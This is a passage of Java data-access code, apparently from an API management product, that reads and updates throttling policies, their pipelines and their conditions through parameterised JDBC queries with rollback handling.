* * @param policyName name of the global polixy * @return {@link GlobalPolicy} * @throws APIManagementException */ public GlobalPolicy getGlobalPolicy(String policyName) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_GLOBAL_POLICY; GlobalPolicy globalPolicy = null; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, policyName); rs = ps.executeQuery(); if (rs.next()) { String siddhiQuery = null; globalPolicy = new GlobalPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); globalPolicy.setDescription(rs.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION)); globalPolicy.setPolicyId(rs.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID)); globalPolicy.setUUID(rs.getString(ThrottlePolicyConstants.COLUMN_UUID)); globalPolicy.setTenantId(rs.getInt(ThrottlePolicyConstants.COLUMN_TENANT_ID)); globalPolicy.setKeyTemplate(rs.getString(ThrottlePolicyConstants.COLUMN_KEY_TEMPLATE)); globalPolicy.setDeployed(rs.getBoolean(ThrottlePolicyConstants.COLUMN_DEPLOYED)); InputStream siddhiQueryBlob = rs.getBinaryStream(ThrottlePolicyConstants.COLUMN_SIDDHI_QUERY); if (siddhiQueryBlob != null) { siddhiQuery = APIMgtDBUtil.getStringFromInputStream(siddhiQueryBlob); } globalPolicy.setSiddhiQuery(siddhiQuery); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return globalPolicy; } /** * Get a particular Global level policy given UUID. * * @param uuid name of the global polixy * @return {@link GlobalPolicy} * @throws APIManagementException */ public GlobalPolicy getGlobalPolicyByUUID(String uuid) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_GLOBAL_POLICY_BY_UUID; GlobalPolicy globalPolicy = null; try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, uuid); rs = ps.executeQuery(); if (rs.next()) { String siddhiQuery = null; globalPolicy = new GlobalPolicy(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); globalPolicy.setDescription(rs.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION)); globalPolicy.setPolicyId(rs.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID)); globalPolicy.setUUID(rs.getString(ThrottlePolicyConstants.COLUMN_UUID)); globalPolicy.setTenantId(rs.getInt(ThrottlePolicyConstants.COLUMN_TENANT_ID)); globalPolicy.setKeyTemplate(rs.getString(ThrottlePolicyConstants.COLUMN_KEY_TEMPLATE)); globalPolicy.setDeployed(rs.getBoolean(ThrottlePolicyConstants.COLUMN_DEPLOYED)); InputStream siddhiQueryBlob = rs.getBinaryStream(ThrottlePolicyConstants.COLUMN_SIDDHI_QUERY); if (siddhiQueryBlob != null) { siddhiQuery = APIMgtDBUtil.getStringFromInputStream(siddhiQueryBlob); } globalPolicy.setSiddhiQuery(siddhiQuery); } } catch (SQLException e) { handleException("Error while retrieving global policy by uuid " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return globalPolicy; } /** * Retrieves {@link APIPolicy} with name <code>policyName</code> and tenant Id <code>tenantNId</code> * <p>This will retrieve complete details about the APIPolicy with all pipelins and conditions.</p> * * @param policyName name of the policy to retrieve from the database * @param tenantId tenantId of the policy * @return {@link APIPolicy} * @throws APIManagementException */ public APIPolicy getAPIPolicy(String policyName, int tenantId) throws 
APIManagementException { APIPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, policyName); selectStatement.setInt(2, tenantId); // Should return only single result resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new APIPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); policy.setUserLevel(resultSet.getString(ThrottlePolicyConstants.COLUMN_APPLICABLE_LEVEL)); policy.setPipelines(getPipelines(policy.getPolicyId())); } } catch (SQLException e) { handleException("Failed to get api policy: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves {@link APIPolicy} with name <code>uuid</code> * <p>This will retrieve complete details about the APIPolicy with all pipelines and conditions.</p> * * @param uuid uuid of the policy to retrieve from the database * @return {@link APIPolicy} * @throws APIManagementException */ public APIPolicy getAPIPolicyByUUID(String uuid) throws APIManagementException { APIPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_BY_UUID_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_BY_UUID_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, uuid); // Should return only single result resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new APIPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); policy.setUserLevel(resultSet.getString(ThrottlePolicyConstants.COLUMN_APPLICABLE_LEVEL)); policy.setPipelines(getPipelines(policy.getPolicyId())); } } catch (SQLException e) { handleException("Failed to get api policy: " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves {@link ApplicationPolicy} with name <code>policyName</code> and tenant Id <code>tenantNId</code> * * @param policyName name of the policy to retrieve from the database * @param tenantId tenantId of the policy * @return {@link ApplicationPolicy} * @throws APIManagementException */ public ApplicationPolicy getApplicationPolicy(String policyName, int tenantId) throws APIManagementException { ApplicationPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_APPLICATION_POLICY_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATION_POLICY_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, policyName); selectStatement.setInt(2, tenantId); // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new 
ApplicationPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); } } catch (SQLException e) { handleException("Failed to get application policy: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves {@link ApplicationPolicy} with name <code>uuid</code> * * @param uuid uuid of the policy to retrieve from the database * @return {@link ApplicationPolicy} * @throws APIManagementException */ public ApplicationPolicy getApplicationPolicyByUUID(String uuid) throws APIManagementException { ApplicationPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_APPLICATION_POLICY_BY_UUID_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATION_POLICY_BY_UUID_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, uuid); // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new ApplicationPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); } } catch (SQLException e) { handleException("Failed to get application policy: " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves {@link SubscriptionPolicy} with name <code>policyName</code> and tenant Id <code>tenantNId</code> * * @param policyName name of the policy to retrieve from the database * @param tenantId tenantId of the policy * @return {@link SubscriptionPolicy} * @throws APIManagementException */ public SubscriptionPolicy getSubscriptionPolicy(String policyName, int tenantId) throws APIManagementException { SubscriptionPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICY_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICY_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, policyName); selectStatement.setInt(2, tenantId); // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new SubscriptionPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); policy.setRateLimitCount(resultSet.getInt(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_COUNT)); policy.setRateLimitTimeUnit(resultSet.getString(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_TIME_UNIT)); policy.setStopOnQuotaReach(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_STOP_ON_QUOTA_REACH)); policy.setBillingPlan(resultSet.getString(ThrottlePolicyConstants.COLUMN_BILLING_PLAN)); InputStream binary = resultSet.getBinaryStream(ThrottlePolicyConstants.COLUMN_CUSTOM_ATTRIB); if (binary != null) { byte[] customAttrib = APIUtil.toByteArray(binary); policy.setCustomAttributes(customAttrib); } } } catch (SQLException e) { handleException("Failed to get subscription policy: " + policyName + '-' + tenantId, e); } catch (IOException e) { handleException("Error while converting input stream to byte array", e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return 
policy; } /** * Retrieves {@link SubscriptionPolicy} with name <code>uuid</code> * * @param uuid name of the policy to retrieve from the database * @return {@link SubscriptionPolicy} * @throws APIManagementException */ public SubscriptionPolicy getSubscriptionPolicyByUUID(String uuid) throws APIManagementException { SubscriptionPolicy policy = null; Connection connection = null; PreparedStatement selectStatement = null; ResultSet resultSet = null; String sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICY_BY_UUID_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_POLICY_BY_UUID_SQL; } try { connection = APIMgtDBUtil.getConnection(); selectStatement = connection.prepareStatement(sqlQuery); selectStatement.setString(1, uuid); // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { policy = new SubscriptionPolicy(resultSet.getString(ThrottlePolicyConstants.COLUMN_NAME)); setCommonPolicyDetails(policy, resultSet); policy.setRateLimitCount(resultSet.getInt(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_COUNT)); policy.setRateLimitTimeUnit(resultSet.getString(ThrottlePolicyConstants.COLUMN_RATE_LIMIT_TIME_UNIT)); policy.setStopOnQuotaReach(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_STOP_ON_QUOTA_REACH)); policy.setBillingPlan(resultSet.getString(ThrottlePolicyConstants.COLUMN_BILLING_PLAN)); InputStream binary = resultSet.getBinaryStream(ThrottlePolicyConstants.COLUMN_CUSTOM_ATTRIB); if (binary != null) { byte[] customAttrib = APIUtil.toByteArray(binary); policy.setCustomAttributes(customAttrib); } } } catch (SQLException e) { handleException("Failed to get subscription policy: " + uuid, e); } catch (IOException e) { handleException("Error while converting input stream to byte array", e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); } return policy; } /** * Retrieves list of pipelines for the policy with policy Id: <code>policyId</code> * * @param policyId policy id of the pipelines * @return list of pipelines * @throws APIManagementException */ private ArrayList<Pipeline> getPipelines(int policyId) throws APIManagementException { Connection connection = null; PreparedStatement pipelinesStatement = null; ResultSet resultSet = null; ArrayList<Pipeline> pipelines = new ArrayList<Pipeline>(); try { connection = APIMgtDBUtil.getConnection(); pipelinesStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_PIPELINES_SQL); int unitTime = 0; int quota = 0; int pipelineId = -1; String timeUnit = null; String quotaUnit = null; String description; pipelinesStatement.setInt(1, policyId); resultSet = pipelinesStatement.executeQuery(); while (resultSet.next()) { Pipeline pipeline = new Pipeline(); ArrayList<Condition> conditions = null; QuotaPolicy quotaPolicy = new QuotaPolicy(); quotaPolicy.setType(resultSet.getString(ThrottlePolicyConstants.COLUMN_QUOTA_POLICY_TYPE)); timeUnit = resultSet.getString(ThrottlePolicyConstants.COLUMN_TIME_UNIT); quotaUnit = resultSet.getString(ThrottlePolicyConstants.COLUMN_QUOTA_UNIT); unitTime = resultSet.getInt(ThrottlePolicyConstants.COLUMN_UNIT_TIME); quota = resultSet.getInt(ThrottlePolicyConstants.COLUMN_QUOTA); pipelineId = resultSet.getInt(ThrottlePolicyConstants.COLUMN_CONDITION_ID); description = resultSet.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION); if (PolicyConstants.REQUEST_COUNT_TYPE.equals(quotaPolicy.getType())) { RequestCountLimit requestCountLimit = new RequestCountLimit(); 
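                    // Populate the request-count limit from the unit time, time unit and quota read for this row.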
requestCountLimit.setUnitTime(unitTime); requestCountLimit.setTimeUnit(timeUnit); requestCountLimit.setRequestCount(quota); quotaPolicy.setLimit(requestCountLimit); } else if (PolicyConstants.BANDWIDTH_TYPE.equals(quotaPolicy.getType())) { BandwidthLimit bandwidthLimit = new BandwidthLimit(); bandwidthLimit.setUnitTime(unitTime); bandwidthLimit.setTimeUnit(timeUnit); bandwidthLimit.setDataUnit(quotaUnit); bandwidthLimit.setDataAmount(quota); quotaPolicy.setLimit(bandwidthLimit); } conditions = getConditions(pipelineId); pipeline.setConditions(conditions); pipeline.setQuotaPolicy(quotaPolicy); pipeline.setId(pipelineId); pipeline.setDescription(description); pipelines.add(pipeline); } } catch (SQLException e) { handleException("Failed to get pipelines for policyId: " + policyId, e); } finally { APIMgtDBUtil.closeAllConnections(pipelinesStatement, connection, resultSet); } return pipelines; } /** * Retrieves list of Conditions for a pipeline specified by <code>pipelineId</code> * * @param pipelineId pipeline Id with conditions to retrieve * @return list of Conditions for a pipeline * @throws APIManagementException */ private ArrayList<Condition> getConditions(int pipelineId) throws APIManagementException { Connection connection = null; PreparedStatement conditionsStatement = null; ResultSet resultSet = null; ArrayList<Condition> conditions = new ArrayList<Condition>(); String startingIP = null; String endingIP = null; String specificIP = null; boolean invert; try { connection = APIMgtDBUtil.getConnection(); conditionsStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_IP_CONDITIONS_SQL); conditionsStatement.setInt(1, pipelineId); resultSet = conditionsStatement.executeQuery(); while (resultSet.next()) { startingIP = resultSet.getString(ThrottlePolicyConstants.COLUMN_STARTING_IP); endingIP = resultSet.getString(ThrottlePolicyConstants.COLUMN_ENDING_IP); specificIP = resultSet.getString(ThrottlePolicyConstants.COLUMN_SPECIFIC_IP); invert = resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_WITHIN_IP_RANGE); if (specificIP != null && !"".equals(specificIP)) { IPCondition ipCondition = new IPCondition(PolicyConstants.IP_SPECIFIC_TYPE); ipCondition.setSpecificIP(specificIP); ipCondition.setInvertCondition(invert); conditions.add(ipCondition); } else if (startingIP != null && !"".equals(startingIP)) { /* Assumes availability of starting ip means ip range is enforced. Therefore availability of ending ip is not checked. 
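                       For example, a row holding only a starting IP and an ending IP is mapped to a single
                       IP range condition below.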
*/ IPCondition ipRangeCondition = new IPCondition(PolicyConstants.IP_RANGE_TYPE); ipRangeCondition.setStartingIP(startingIP); ipRangeCondition.setEndingIP(endingIP); ipRangeCondition.setInvertCondition(invert); conditions.add(ipRangeCondition); } } setHeaderConditions(pipelineId, conditions); setQueryParameterConditions(pipelineId, conditions); setJWTClaimConditions(pipelineId, conditions); } catch (SQLException e) { handleException("Failed to get conditions for pipelineId: " + pipelineId, e); } finally { APIMgtDBUtil.closeAllConnections(conditionsStatement, connection, resultSet); } return conditions; } /** * Add Header conditions of pipeline with pipeline Id: <code>pipelineId</code> to a * provided {@link Condition} array * * @param pipelineId Id of the pipeline * @param conditions condition array to populate * @throws APIManagementException */ private void setHeaderConditions(int pipelineId, ArrayList<Condition> conditions) throws APIManagementException { Connection connection = null; PreparedStatement conditionsStatement = null; ResultSet resultSet = null; try { connection = APIMgtDBUtil.getConnection(); conditionsStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_HEADER_CONDITIONS_SQL); conditionsStatement.setInt(1, pipelineId); resultSet = conditionsStatement.executeQuery(); while (resultSet.next()) { HeaderCondition headerCondition = new HeaderCondition(); headerCondition.setHeader(resultSet.getString(ThrottlePolicyConstants.COLUMN_HEADER_FIELD_NAME)); headerCondition.setValue(resultSet.getString(ThrottlePolicyConstants.COLUMN_HEADER_FIELD_VALUE)); headerCondition.setInvertCondition(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_IS_HEADER_FIELD_MAPPING)); conditions.add(headerCondition); } } catch (SQLException e) { handleException("Failed to get header conditions for pipelineId: " + pipelineId, e); } finally { APIMgtDBUtil.closeAllConnections(conditionsStatement, connection, resultSet); } } /** * Add Query parameter conditions of pipeline with pipeline Id: <code>pipelineId</code> to a * provided {@link Condition} array * * @param pipelineId Id of the pipeline * @param conditions condition array to populate * @throws APIManagementException */ private void setQueryParameterConditions(int pipelineId, ArrayList<Condition> conditions) throws APIManagementException { Connection connection = null; PreparedStatement conditionsStatement = null; ResultSet resultSet = null; try { connection = APIMgtDBUtil.getConnection(); conditionsStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_QUERY_PARAMETER_CONDITIONS_SQL); conditionsStatement.setInt(1, pipelineId); resultSet = conditionsStatement.executeQuery(); while (resultSet.next()) { QueryParameterCondition queryParameterCondition = new QueryParameterCondition(); queryParameterCondition .setParameter(resultSet.getString(ThrottlePolicyConstants.COLUMN_PARAMETER_NAME)); queryParameterCondition.setValue(resultSet.getString(ThrottlePolicyConstants.COLUMN_PARAMETER_VALUE)); queryParameterCondition.setInvertCondition(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_IS_PARAM_MAPPING)); conditions.add(queryParameterCondition); } } catch (SQLException e) { handleException("Failed to get query parameter conditions for pipelineId: " + pipelineId, e); } finally { APIMgtDBUtil.closeAllConnections(conditionsStatement, connection, resultSet); } } /** * Add JWT claim conditions of pipeline with pipeline Id: <code>pipelineId</code> to a * provided {@link Condition} array * * @param pipelineId Id of the 
pipeline * @param conditions condition array to populate * @throws APIManagementException */ private void setJWTClaimConditions(int pipelineId, ArrayList<Condition> conditions) throws APIManagementException { Connection connection = null; PreparedStatement conditionsStatement = null; ResultSet resultSet = null; try { connection = APIMgtDBUtil.getConnection(); conditionsStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.GET_JWT_CLAIM_CONDITIONS_SQL); conditionsStatement.setInt(1, pipelineId); resultSet = conditionsStatement.executeQuery(); while (resultSet.next()) { JWTClaimsCondition jwtClaimsCondition = new JWTClaimsCondition(); jwtClaimsCondition.setClaimUrl(resultSet.getString(ThrottlePolicyConstants.COLUMN_CLAIM_URI)); jwtClaimsCondition.setAttribute(resultSet.getString(ThrottlePolicyConstants.COLUMN_CLAIM_ATTRIBUTE)); jwtClaimsCondition.setInvertCondition(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_IS_CLAIM_MAPPING)); conditions.add(jwtClaimsCondition); } } catch (SQLException e) { handleException("Failed to get jwt claim conditions for pipelineId: " + pipelineId, e); } finally { APIMgtDBUtil.closeAllConnections(conditionsStatement, connection, resultSet); } } /** * Updates API level policy. * <p>policy name and tenant id should be specified in <code>policy</code></p> * <p> * Exsisting policy will be deleted and new policy will be inserted to the database * with old POLICY_ID. Uses {@link #updateAPIPolicy(APIPolicy)} * to create new policy. * </p> * * @param policy updated policy object * @throws APIManagementException */ public APIPolicy updateAPIPolicy(APIPolicy policy) throws APIManagementException { Connection connection = null; PreparedStatement selectStatement = null; PreparedStatement deleteStatement = null; ResultSet resultSet = null; int oldPolicyId = 0; String oldPolicyUUID = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); if (policy != null) { if (policy.getPolicyName() != null && policy.getTenantId() != -1) { selectStatement = connection .prepareStatement(SQLConstants.ThrottleSQLConstants.GET_API_POLICY_ID_SQL); selectStatement.setString(1, policy.getPolicyName()); selectStatement.setInt(2, policy.getTenantId()); } else if (policy.getUUID() != null) { selectStatement = connection .prepareStatement(SQLConstants.ThrottleSQLConstants.GET_API_POLICY_ID_BY_UUID_SQL); selectStatement.setString(1, policy.getUUID()); } else { String errorMsg = "Policy object doesn't contain mandatory parameters. At least UUID or Name,Tenant Id" + " should be provided. 
Name: " + policy.getPolicyName() + ", Tenant Id: " + policy.getTenantId() + ", UUID: " + policy.getUUID(); log.error(errorMsg); throw new APIManagementException(errorMsg); } } else { String errorMsg = "Provided Policy to add is null"; log.error(errorMsg); throw new APIManagementException(errorMsg); } // Should return only single row resultSet = selectStatement.executeQuery(); if (resultSet.next()) { oldPolicyId = resultSet.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID); oldPolicyUUID = resultSet.getString(ThrottlePolicyConstants.COLUMN_UUID); } deleteStatement = connection.prepareStatement(SQLConstants.ThrottleSQLConstants.DELETE_API_POLICY_SQL); deleteStatement.setInt(1, policy.getTenantId()); deleteStatement.setString(2, policy.getPolicyName()); deleteStatement.executeUpdate(); policy.setPolicyId(oldPolicyId); if (!StringUtils.isBlank(oldPolicyUUID)) { policy.setUUID(oldPolicyUUID); } updateAPIPolicy(policy, connection); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the add Api Policy: " + policy.toString(), ex); } } handleException("Failed to update api policy: " + policy.getPolicyName() + '-' + policy.getTenantId(), e); } finally { APIMgtDBUtil.closeAllConnections(selectStatement, connection, resultSet); APIMgtDBUtil.closeAllConnections(deleteStatement, null, null); } return policy; } /** * Updates Application level policy. * <p>policy name and tenant id should be specified in <code>policy</code></p> * * @param policy updated policy object * @throws APIManagementException */ public void updateApplicationPolicy(ApplicationPolicy policy) throws APIManagementException { Connection connection = null; PreparedStatement updateStatement = null; boolean hasCustomAttrib = false; String updateQuery; if (policy.getTenantId() == -1 || StringUtils.isEmpty(policy.getPolicyName())) { String errorMsg = "Policy object doesn't contain mandatory parameters. Name: " + policy.getPolicyName() + ", Tenant Id: " + policy.getTenantId(); log.error(errorMsg); throw new APIManagementException(errorMsg); } try { if (policy.getCustomAttributes() != null) { hasCustomAttrib = true; } connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateQuery = SQLConstants.UPDATE_APPLICATION_POLICY_SQL; if (hasCustomAttrib) { updateQuery = SQLConstants.UPDATE_APPLICATION_POLICY_WITH_CUSTOM_ATTRIBUTES_SQL; } } else if (!StringUtils.isBlank(policy.getUUID())) { updateQuery = SQLConstants.UPDATE_APPLICATION_POLICY_BY_UUID_SQL; if (hasCustomAttrib) { updateQuery = SQLConstants.UPDATE_APPLICATION_POLICY_WITH_CUSTOM_ATTRIBUTES_BY_UUID_SQL; } } else { String errorMsg = "Policy object doesn't contain mandatory parameters. At least UUID or Name,Tenant Id" + " should be provided. 
Name: " + policy.getPolicyName() + ", Tenant Id: " + policy.getTenantId() + ", UUID: " + policy.getUUID(); log.error(errorMsg); throw new APIManagementException(errorMsg); } updateStatement = connection.prepareStatement(updateQuery); if (!StringUtils.isEmpty(policy.getDisplayName())) { updateStatement.setString(1, policy.getDisplayName()); } else { updateStatement.setString(1, policy.getPolicyName()); } updateStatement.setString(2, policy.getDescription()); updateStatement.setString(3, policy.getDefaultQuotaPolicy().getType()); if (PolicyConstants.REQUEST_COUNT_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { RequestCountLimit limit = (RequestCountLimit) policy.getDefaultQuotaPolicy().getLimit(); updateStatement.setLong(4, limit.getRequestCount()); updateStatement.setString(5, null); } else if (PolicyConstants.BANDWIDTH_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { BandwidthLimit limit = (BandwidthLimit) policy.getDefaultQuotaPolicy().getLimit(); updateStatement.setLong(4, limit.getDataAmount()); updateStatement.setString(5, limit.getDataUnit()); } updateStatement.setLong(6, policy.getDefaultQuotaPolicy().getLimit().getUnitTime()); updateStatement.setString(7, policy.getDefaultQuotaPolicy().getLimit().getTimeUnit()); if (hasCustomAttrib) { updateStatement.setBlob(8, new ByteArrayInputStream(policy.getCustomAttributes())); if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement.setString(9, policy.getPolicyName()); updateStatement.setInt(10, policy.getTenantId()); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement.setString(9, policy.getUUID()); } } else { if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement.setString(8, policy.getPolicyName()); updateStatement.setInt(9, policy.getTenantId()); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement.setString(8, policy.getUUID()); } } updateStatement.executeUpdate(); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the update Application Policy: " + policy.toString(), ex); } } handleException( "Failed to update application policy: " + policy.getPolicyName() + '-' + policy.getTenantId(), e); } finally { APIMgtDBUtil.closeAllConnections(updateStatement, connection, null); } } /** * Updates Subscription level policy. * <p>policy name and tenant id should be specified in <code>policy</code></p> * * @param policy updated policy object * @throws APIManagementException */ public void updateSubscriptionPolicy(SubscriptionPolicy policy) throws APIManagementException { Connection connection = null; PreparedStatement updateStatement = null; boolean hasCustomAttrib = false; String updateQuery; try { if (policy.getCustomAttributes() != null) { hasCustomAttrib = true; } if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_SQL; if (hasCustomAttrib) { updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_WITH_CUSTOM_ATTRIBUTES_SQL; } } else if (!StringUtils.isBlank(policy.getUUID())) { updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_BY_UUID_SQL; if (hasCustomAttrib) { updateQuery = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_WITH_CUSTOM_ATTRIBUTES_BY_UUID_SQL; } } else { String errorMsg = "Policy object doesn't contain mandatory parameters. 
At least UUID or Name,Tenant Id" + " should be provided. Name: " + policy.getPolicyName() + ", Tenant Id: " + policy.getTenantId() + ", UUID: " + policy.getUUID(); log.error(errorMsg); throw new APIManagementException(errorMsg); } connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); updateStatement = connection.prepareStatement(updateQuery); if (!StringUtils.isEmpty(policy.getDisplayName())) { updateStatement.setString(1, policy.getDisplayName()); } else { updateStatement.setString(1, policy.getPolicyName()); } updateStatement.setString(2, policy.getDescription()); updateStatement.setString(3, policy.getDefaultQuotaPolicy().getType()); if (PolicyConstants.REQUEST_COUNT_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { RequestCountLimit limit = (RequestCountLimit) policy.getDefaultQuotaPolicy().getLimit(); updateStatement.setLong(4, limit.getRequestCount()); updateStatement.setString(5, null); } else if (PolicyConstants.BANDWIDTH_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { BandwidthLimit limit = (BandwidthLimit) policy.getDefaultQuotaPolicy().getLimit(); updateStatement.setLong(4, limit.getDataAmount()); updateStatement.setString(5, limit.getDataUnit()); } updateStatement.setLong(6, policy.getDefaultQuotaPolicy().getLimit().getUnitTime()); updateStatement.setString(7, policy.getDefaultQuotaPolicy().getLimit().getTimeUnit()); updateStatement.setInt(8, policy.getRateLimitCount()); updateStatement.setString(9, policy.getRateLimitTimeUnit()); updateStatement.setBoolean(10, policy.isStopOnQuotaReach()); updateStatement.setString(11, policy.getBillingPlan()); if (hasCustomAttrib) { long lengthOfStream = policy.getCustomAttributes().length; updateStatement.setBinaryStream(12, new ByteArrayInputStream(policy.getCustomAttributes()), lengthOfStream); if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement.setString(13, policy.getPolicyName()); updateStatement.setInt(14, policy.getTenantId()); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement.setString(13, policy.getUUID()); } } else { if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement.setString(12, policy.getPolicyName()); updateStatement.setInt(13, policy.getTenantId()); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement.setString(12, policy.getUUID()); } } updateStatement.executeUpdate(); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. 
                    // Exception will be thrown later for the outer exception
                    log.error("Failed to rollback the update Subscription Policy: " + policy.toString(), ex);
                }
            }
            handleException(
                    "Failed to update subscription policy: " + policy.getPolicyName() + '-' + policy.getTenantId(), e);
        } finally {
            APIMgtDBUtil.closeAllConnections(updateStatement, connection, null);
        }
    }

    /**
     * Updates global throttle policy in database
     *
     * @param policy updated policy object
     * @throws APIManagementException
     */
    public void updateGlobalPolicy(GlobalPolicy policy) throws APIManagementException {
        Connection connection = null;
        PreparedStatement updateStatement = null;
        InputStream siddhiQueryInputStream;
        try {
            byte[] byteArray = policy.getSiddhiQuery().getBytes(Charset.defaultCharset());
            int lengthOfBytes = byteArray.length;
            siddhiQueryInputStream = new ByteArrayInputStream(byteArray);
            connection = APIMgtDBUtil.getConnection();
            connection.setAutoCommit(false);
